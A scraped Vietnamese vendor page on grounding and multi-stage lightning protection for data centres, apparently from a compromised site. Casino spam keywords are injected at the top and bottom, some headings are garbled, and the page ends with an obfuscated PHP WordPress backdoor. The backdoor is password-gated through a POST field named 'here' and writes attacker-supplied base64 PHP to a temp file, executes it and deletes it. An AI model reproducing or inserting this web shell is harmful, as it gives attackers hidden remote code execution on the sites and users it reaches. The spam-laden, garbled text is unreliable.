Hệ thống tiếp đất và chống sét cho Trung tâm dữ liệu - Máy Chủ Việt Nam
jeu plinko avis pin up catcasino vavada официальный jucky jet

Hệ thống tiếp đất và chống sét cho Trung tâm dữ liệu

Ngày 07/02/2013 đăng bởi seo3.VS [email protected]

Thiết bị trong Trung tâm dữ liệu là thiết bị đòi hỏi sự ổn định và liên tục 24/24. Tránh sự tách động của sét và nhiễu từ bên ngoài tác động đến, làm gián đọan họat động của hệ thống, ta cần xây dựng hệ thống tiếp đất và chống sét lan truyền cho Trung tâm dữ liệu.

Chng sét cho ngun AC

Ni đt thiết b

Việc chống sét lan truyền cho các thiết bị bên trong Trung tâm Dữ liệu phải đáp ứng các yêu cầu:

  • Phải đảm bảo chức năng ngắt sét cả về nguồn điện, cũng như việc lan truyền sét đến các hệ thống khác trong Trung tâm Dữ liệu.
  • Hệ thống phải đảm bảo tiếp đất cho toàn bộ thiết bị trong Trung tâm Dữ liệu.
  • Các thiết bị tiếp đất phải đảm bảo các tiêu chuẩn của ngành viễn thông, điện lực.
  • Các thiết bị chống sét phải được lắp đặt và bảo vệ theo các tiêu chuẩn quốc tế và nhà sản xuất yêu cầu.
  • Sử dụng thiết bị chống sét đa cấp.
  • Chống sét sơ cấp bằng thiết bị có khả năng cắt sét mạnh mẽ, đặc biệt với dạng xung 10/350µs do ảnh hưởng trực tiếp khi có sét đánh trên phạm vi công trình, tối thiểu 50kA/pha (xung 8/20µs) và 100kA/pha (xung 10/350µs). Thiết bị được bố trí lắp đặt tại các tủ điện.
  • Chống sét tầng thứ cấp phải có mức điện áp dư thấp và được lắp đặt gần với thiết bị cần bảo vệ trong phạm vi dưới 50 mét.
  • Kết hợp sử dụng các thiết bị chống sét có chức năng lọc nhiễu EMI, RFI.
  • Chỉ bảo vệ điện nguồn của máy chủ.
  • Sử dụng tủ chống sét đa tầng: sơ cấp, thứ cấp, lọc nhiễu.

 

.
.
.
.
Danh mục sản phẩm
024 7303 4068
jeu plinko avis pin up catcasino vavada официальный jucky jet
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}